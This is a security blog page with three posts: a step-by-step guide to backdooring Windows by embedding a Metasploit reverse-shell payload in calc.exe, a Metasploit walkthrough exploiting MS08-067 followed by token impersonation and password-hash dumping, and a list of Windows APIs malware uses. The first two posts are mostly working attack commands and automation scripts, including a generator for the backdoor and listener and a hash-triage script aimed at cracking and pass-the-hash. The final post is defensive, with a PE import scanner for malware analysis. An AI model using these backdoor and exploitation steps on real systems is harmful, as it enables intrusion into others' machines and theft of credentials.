Thursday, May 29, 2014

Hack All Windows OSes (Windows 8/7/Vista/XP) using Metasploit Backdoors

This post shows how to compromise Windows 8, Windows 7, Windows Vista, Windows XP etc. using a Metasploit-generated backdoor binary.


Copy the created backdoor to the victim's machine (USB drive, network share, etc.).

When the victim executes the malicious binary, it connects back to the attacker's machine, so the handler must already be listening on LHOST:LPORT before the binary runs.

Commands to create the backdoor (on the attacker machine, 192.168.56.101)
msfpayload -h
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=8888 R > calc_pld.raw
msfencode -h
# msfencode -e x86/shikata_ga_nai -c 3 -t exe -i calc_pld.raw -x /root/calc.exe -o calc_backdoor.exe
R writes the raw payload, which msfencode (-i) encodes three times with shikata_ga_nai and embeds into a copy of /root/calc.exe (-x); adding -k keeps the template's original behaviour so the victim still gets a working calculator. The payload name must be the same one the handler is configured with: a windows/shell_reverse_tcp binary connecting to a windows/meterpreter/reverse_tcp handler will not produce a Meterpreter session.

Commands to create the handler (on the attacker machine, same LHOST/LPORT/PAYLOAD as the binary)
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 8888
exploit

If everything goes fine, Metasploit starts the handler and waits for connections from the victim. Once the victim executes the binary, the connect-back is caught and a Meterpreter session is created.
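One way to keep the backdoor and the handler in agreement, as an added example written for this page (not the post's own tooling): a small Python script derives the msfpayload/msfencode command line and an msfconsole resource file from a single payload spec, and refuses specs the handler could not serve. The file names, the -k flag and the ExitOnSession / exploit -j -z handler settings are my choices; the payload, addresses and encoder options are the ones used above.

```python
"""Derive the backdoor build commands and the handler resource file from one
payload spec, so the binary and exploit/multi/handler cannot disagree.
Added example for this page, not the original post's tooling."""
import ipaddress

# Shared spec: values taken from the commands above (file names are my choice).
SPEC = {
    "payload": "windows/meterpreter/reverse_tcp",
    "lhost": "192.168.56.101",        # attacker address the victim connects back to
    "lport": 8888,
    "template": "/root/calc.exe",     # legitimate binary used as the -x template
    "out": "calc_backdoor.exe",
}

def validate(spec):
    """Reject specs that would build a backdoor this handler cannot catch."""
    ipaddress.IPv4Address(spec["lhost"])   # raises ValueError on a bad address
    if not 1 <= int(spec["lport"]) <= 65535:
        raise ValueError("LPORT out of range")
    if "reverse" not in spec["payload"]:
        raise ValueError("an LHOST/LPORT handler only makes sense for reverse (connect-back) payloads")
    return True

def backdoor_commands(spec):
    """msfpayload writes the raw payload; msfencode encodes it into the template."""
    validate(spec)
    raw = "payload.raw"
    return [
        f"msfpayload {spec['payload']} LHOST={spec['lhost']} LPORT={spec['lport']} R > {raw}",
        f"msfencode -e x86/shikata_ga_nai -c 3 -t exe -i {raw} "
        f"-x {spec['template']} -k -o {spec['out']}",
    ]

def handler_rc(spec):
    """Resource file for: msfconsole -r handler.rc"""
    validate(spec)
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {spec['payload']}",    # same payload as the binary, or no session
        f"set LHOST {spec['lhost']}",
        f"set LPORT {spec['lport']}",
        "set ExitOnSession false",           # keep listening after the first session
        "exploit -j -z",                     # run as a background job
    ]) + "\n"

if __name__ == "__main__":
    print("\n".join(backdoor_commands(SPEC)))
    with open("handler.rc", "w") as f:
        f.write(handler_rc(SPEC))
```

Run the printed commands, then start the listener with msfconsole -r handler.rc; because both sides are generated from SPEC, changing the payload or port in one place changes it in both.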

http://blog.disects.com/2014/05/metasploit-gaining-access-using-ms08.html

Metasploit: Gaining Access using MS08-067 (CVE-2008-4250)

Setup details
Victim (Windows XP SP3): 192.168.56.101
Attacker (Kali Linux):   192.168.56.102

Use the commands below to launch the exploit.
search        find the desired exploit, payload, etc.
use           select the required exploit module
set           set options accordingly (RHOST, RPORT, LHOST, LPORT, PAYLOAD, etc.)
run/exploit   launch the exploit
meterpreter   the shell that executes commands in the context of the victim
msf> search smb
msf> use exploit/windows/smb/ms08_067_netapi
msf> show options
msf> set RHOST 192.168.56.101
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST 192.168.56.102
msf> show options
msf> exploit
RHOST must be the victim's address (192.168.56.101), and LHOST the attacker's own interface on that network (192.168.56.102), since the reverse_tcp payload connects back to it.

Check with show options that every option the exploit needs is set properly, then launch the exploit.

The exploit succeeds and we land directly at a meterpreter prompt.

Details of the victim's operating system

Once we have access to the victim there are many post-exploitation options: privilege escalation, maintaining access, clearing logs, etc.
meterpreter> screenshot
meterpreter> migrate <pid>
(pick the PID of a long-lived process such as explorer.exe from ps; the ms08_067 session runs inside the exploited Server service's svchost.exe and is lost if that process dies)
To impersonate tokens and add users, load the incognito extension
meterpreter> use incognito
meterpreter> help
(incognito adds the list_tokens, impersonate_token and add_user commands)
Dump users and their LM/NTLM hashes (needs SYSTEM, which the ms08_067 shell already runs as)
meterpreter> hashdump
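For the hashdump output, an added example (mine, not the post's) that parses the user:rid:lm:nt::: lines and flags what matters first: the RID 500 account, a blank password (NT hash of the empty string) and any account that still has a real LM hash, which on XP means the password is at most 14 characters and cracks quickly. The sample lines are constructed; apart from the two empty-hash constants, the hash values are placeholders.

```python
"""Triage Meterpreter hashdump output: parse 'user:rid:lm:nt:::' lines and
flag blank passwords, stored LM hashes and the built-in Administrator.
Added example, not from the original post; the sample is constructed, the
only real values in it are the two empty-hash constants below."""
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty string: no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty string: blank password

SAMPLE = """\
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:fedcba9876543210fedcba9876543210:fedcba9876543210fedcba9876543210:::
"""

def parse_hashdump(text):
    """Return [(user, rid, lm, nt)] and skip banners or malformed lines."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit() or len(parts[3]) != 32:
            continue
        rows.append((parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return rows

def triage(rows):
    """Map user -> findings; an account with no finding is omitted."""
    findings = {}
    for user, rid, lm, nt in rows:
        notes = []
        if rid == 500:
            notes.append("built-in Administrator (RID 500)")
        if nt == EMPTY_NT:
            notes.append("blank password")
        if lm != EMPTY_LM:
            notes.append("LM hash stored (crackable)")
        if notes:
            findings[user] = notes
    return findings

if __name__ == "__main__":
    for user, notes in triage(parse_hashdump(SAMPLE)).items():
        print(f"{user}: {'; '.join(notes)}")
```

The empty-LM constant is what hashdump shows when LM hashing is disabled or the password exceeds 14 characters, so any other LM value is the quick win; the NT hash of a non-blank account is still usable for pass-the-hash even when it does not crack.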

The same steps apply to other exploits: select the module with the command below and set its options accordingly.
use exploit/windows/browser/ie_aurora

Other useful blogs
http://blog.disects.com/2014/04/hacking-android-devices-using.html
http://blog.disects.com/2013/12/manual-unpacking-of-upx-packed-binary.html

Vulnerability details
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250

Friday, May 2, 2014

Windows APIs used by Malware

The Windows APIs below are frequently used by malware, though this is not an exhaustive list.

Anti-debugging techniques
kernel32.CloseHandle - called with an invalid handle; under a debugger this raises an exception instead of just failing
kernel32.GetTickCount - timing check; a large gap between two calls suggests single-stepping
Check whether the BeingDebugged byte at offset 0x02 in the PEB is set
Check NtGlobalFlag at offset 0x68 in the (32-bit) PEB, 0xBC in the 64-bit PEB, for the heap debug flags (0x70) a debugger sets

Process injection and run-time API resolution
kernel32.GetProcAddress - resolve an API by name at run time (keeps it out of the import table)
kernel32.LoadLibraryA - load a DLL at run time
kernel32.OpenProcess - get a handle to a target process
kernel32.VirtualAllocEx - reserve/commit memory within the virtual address space of another process
kernel32.CreateRemoteThread - create a thread inside another process, typically starting at the injected code

FindResource / LockResource - locate and map an embedded resource (payloads are often stored as resources)
ShellExecute - launch a file or URL
GetThreadContext - read a thread's registers (process hollowing, thread hijacking)
CreateProcessA - spawn a process, often suspended so it can be hollowed
ReadProcessMemory / WriteProcessMemory - read and write another process's memory
NtQueueApcThread - queue an APC in a target thread (APC injection)
CreateToolhelp32Snapshot / Thread32First / Thread32Next - enumerate processes and threads to pick an injection target
SetWindowsHookEx - install a hook (keylogging, or forcing a DLL into other processes)
NtSetSystemInformation - undocumented; used by some rootkits to load a driver
CreateFile - open files, devices and named pipes

File handling functions
Registry handling functions
Network communication APIs
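To see these APIs from the analyst's side, here is an added example (mine, not the post's): a dependency-free Python import-table parser that walks a PE file's import directory and flags the API chains above only when a complete chain is present (a lone OpenProcess is noise; OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread is the remote-thread injection pattern). The PEB checks never show up in imports, so only the API-based indicators are covered. build_pe() assembles a synthetic PE32 as constructed test input; feed parse_imports() the bytes of a real file to triage it. The indicator names and groupings are my own.

```python
"""Static triage of a PE import table for the API chains listed above.
Added example, not from the original post. Minimal pure-Python PE parser
(no pefile needed); build_pe() only constructs synthetic test input."""
import struct

# API chains flagged only when every member is imported (trailing A/W stripped).
INDICATORS = {
    "remote thread injection": {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"},
    "APC injection":           {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "NtQueueApcThread"},
    "process hollowing":       {"CreateProcess", "GetThreadContext", "WriteProcessMemory"},
    "dynamic API resolution":  {"LoadLibrary", "GetProcAddress"},
    "payload in resources":    {"FindResource", "LockResource"},
    "hooking / keylogging":    {"SetWindowsHookEx"},
    "thread enumeration":      {"CreateToolhelp32Snapshot", "Thread32First", "Thread32Next"},
}

def _cstr(data, off):
    return data[off:data.index(b"\x00", off)].decode("ascii")

def _rva_to_off(rva, sections):
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} outside every section")

def parse_imports(pe):
    """Return {dll: [function names]} for a PE32 or PE32+ image given as bytes."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    nsec, opt_size = struct.unpack_from("<H", pe, coff + 2)[0], struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    is64 = struct.unpack_from("<H", pe, opt)[0] == 0x20B
    # DataDirectory starts at 96 (PE32) or 112 (PE32+); the import directory is entry 1.
    imp_rva = struct.unpack_from("<I", pe, opt + (112 if is64 else 96) + 8)[0]
    sections = []
    for i in range(nsec):                       # section table follows the optional header
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, opt + opt_size + 40 * i + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    tfmt, ord_flag = ("<Q", 1 << 63) if is64 else ("<I", 1 << 31)
    imports, desc = {}, _rva_to_off(imp_rva, sections)
    while True:                                 # IMAGE_IMPORT_DESCRIPTOR array, null-terminated
        oft, _, _, name_rva, ft = struct.unpack_from("<IIIII", pe, desc)
        if name_rva == 0:
            break
        names, thunk = [], _rva_to_off(oft or ft, sections)   # prefer the INT; fall back to the IAT
        while (entry := struct.unpack_from(tfmt, pe, thunk)[0]) != 0:
            names.append(f"#{entry & 0xFFFF}" if entry & ord_flag            # import by ordinal
                         else _cstr(pe, _rva_to_off(entry, sections) + 2))    # skip the 2-byte hint
            thunk += struct.calcsize(tfmt)
        imports[_cstr(pe, _rva_to_off(name_rva, sections)).lower()] = names
        desc += 20
    return imports

def flag_indicators(imports):
    """Name every indicator whose complete API chain is present in the imports."""
    seen = {n[:-1] if len(n) > 1 and n[-1] in "AW" else n for fns in imports.values() for n in fns}
    return sorted(k for k, chain in INDICATORS.items() if chain <= seen)

def build_pe(imports):
    """Construct a minimal PE32 whose single section holds only an import table (test input)."""
    SEC_RVA, SEC_OFF, n = 0x1000, 0x200, len(imports)
    sec = bytearray(20 * (n + 1))               # descriptor array first, null-terminated
    def add(blob):                              # append to the section, return the RVA
        rva = SEC_RVA + len(sec); sec.extend(blob); return rva
    descs = []
    for dll, funcs in imports.items():
        hint_names = [add(b"\x00\x00" + f.encode() + b"\x00") for f in funcs]   # hint + name
        dll_rva = add(dll.encode() + b"\x00")
        thunks = b"".join(struct.pack("<I", r) for r in hint_names) + b"\x00" * 4
        descs.append((add(thunks), dll_rva, add(thunks)))   # INT and IAT are identical on disk
    for i, (int_rva, dll_rva, iat_rva) in enumerate(descs):
        struct.pack_into("<IIIII", sec, 20 * i, int_rva, 0, 0, dll_rva, iat_rva)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                           # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                             # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8, SEC_RVA, 20 * (n + 1))     # import directory entry
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x102)
    shdr = struct.pack("<8sIIIIIIHHI", b".idata", len(sec), SEC_RVA, len(sec), SEC_OFF, 0, 0, 0, 0, 0xC0000040)
    dos = bytearray(64); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 0x3C, 64)
    return (bytes(dos) + b"PE\x00\x00" + coff + bytes(opt) + shdr).ljust(SEC_OFF, b"\x00") + bytes(sec)

# Constructed sample: the classic injection chain plus run-time API resolution and a hook.
SAMPLE = build_pe({
    "kernel32.dll": ["OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
                     "LoadLibraryA", "GetProcAddress", "CloseHandle"],
    "user32.dll": ["SetWindowsHookExA", "MessageBoxA"],
})

if __name__ == "__main__":
    imps = parse_imports(SAMPLE)
    for dll, fns in imps.items():
        print(f"{dll}: {', '.join(fns)}")
    print("indicators:", flag_indicators(imps))
```

A packed sample (UPX, see the unpacking post linked above) typically imports almost nothing except LoadLibrary and GetProcAddress, which is why that pair is an indicator on its own: the real import set only appears after unpacking, and only then do the injection chains become visible to this kind of static check.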

Tutorial for learning Malware analysis
https://noppa.aalto.fi/noppa/kurssi/t-110.6220/luennot